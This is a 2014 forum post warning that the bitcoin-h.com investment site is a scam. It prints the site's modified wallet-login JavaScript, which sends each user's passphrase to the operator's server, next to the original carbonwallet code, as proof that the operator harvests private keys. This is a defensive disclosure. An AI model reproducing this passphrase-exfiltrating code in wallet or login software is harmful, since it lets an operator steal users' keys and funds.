Ninjastic
PostEdited versionsQuotes to this post
Post
Topic
Board Investor-based games
Re: bitcoin-h.com = earn a profit up to 3% - 10% /daily! - INSTANT WITHDRAWAL
by
devthedev
on 20/07/2014, 21:40:55 UTC
Quote from: williamj2543 on July 20, 2014, 09:24:45 PM
Haha. Bitsky, you still investing? It would be nice if you would invest like 0.01 to see if its legit. I would chip in 0.005

That's what bitcoin-h wants, after scamming you guys of the .01 he'll blame it on a technical malfunction on your side and either attempt to continue scamming or re-host the source on a new domain.

I'm 120% sure bitcoin-h.com is not legit.

__________________________

After he was asked what script he was using this was his response,

Quote from: bitcoin-h on July 20, 2014, 07:07:34 PM
the original sourse code is https://github.com/carbonwallet/carbonwallet.github.io (all can verify) was a bit modified for our needs.

The issue is, the critical section of code, the one that creates the key pair sequence from the password or pass phrase looks like this on the original web site:

Code:
$('#open-sesame').click(function(){

  var seed = $('#password').val();
  seed = mn_decode(seed);
  Electrum.init(seed, function(r) {
      if(r % 20 == 0)
        $('#seed-progress').css('width', (r + 19) + '%');
    },
    function(privKey) {
      Electrum.gen(10, function(r) {
        WALLET.getKeys().push(new Bitcoin.ECKey(r[1]));
        if(WALLET.getKeys().length == 10)
          login_success();
      });
    }
  );
      
  return true;
})

Notice how it simply creates 10 key pairs.  However, on the web site this function is highly modified:

Code:
$('#open-sesame').click(function(){

$.ajax({
url: 'api/login.php',
type: 'POST',
dataType: 'json',
data: 'passphrase='+$('#password').val(),
success: function(e)
{
w_id = e.id;
can_go = true;

if (e.unread > 0) {
$('#unread_count').html('('+e.unread+')')
}

if (e.mp == 1) {
$('[name=old_pass]').removeClass('hidden');
} else {
$('[name=old_pass]').addClass('hidden');
}

$.ajax({
url: 'api/commission.php',
type: 'POST',
dataType: 'json',
data: 'w='+w_id,
success: function(e)
{
$('#comm').html(e.comm);
withdraw_max = e.comm.replace(/0+$/,'');
withdraw_max = e.comm.replace(/\.+$/,'');
}
});

$.ajax({
url: 'api/withdraw.php',
type: 'POST',
data: 'w='+w_id,
success: function(e)
{
$('#withdraw').html(e);
$(document).on('click', '#withdraw_btn', function()
{
$('#withdrawModal').modal();
$('#withdrawAmmount').html(withdraw_max);
$('input[name=withdraw_amount]').val(withdraw_max);
})
}
});

$(document).on('click', '#withdrawBTC', function()
{
var wform = $(this).closest('form').serialize();
$.ajax({
url: 'api/withdraw.php',
type: 'POST',
data: wform,
success: function(e)
{
$('#withdraw').html(e);
}
});
})

$.ajax({
url: 'api/messages.php',
type: 'POST',
data: 'w='+w_id,
success: function(e)
{
$('#messages').html(e);
$(document).on('click', '.send_msg form button.submit', function()
{
var wform = $(this).closest('form').serialize();
$.ajax({
url: 'api/messages.php',
type: 'POST',
data: wform,
success: function(e)
{
$('#messages').html(e);
}
});
});
}
});

mn_words = e.seed;

var seed = $('#password').val();
seed = mn_decode(seed);

Electrum.init(seed, function(r) {
if(r % 20 == 0)
$('#seed-progress').css('width', (r + 19) + '%');
},
function(privKey) {
Electrum.gen(10, function(r) {
WALLET.getKeys().push(new Bitcoin.ECKey(r[1]));
if(WALLET.getKeys().length == 10)
login_success();
});
}
);
}
});

return true;
})

bitcoin-h, you collect the private keys of every one of your customers. Here is the proof, directly from your code:

Code:
$('#open-sesame').click(function(){

$.ajax({
url: 'api/login.php',
type: 'POST',
dataType: 'json',
data: 'passphrase='+$('#password').val(),
success: function(e)
{

Specifically this line:

Code:
data: 'passphrase='+$('#password').val(),

Thanks BurtW for the insight on this one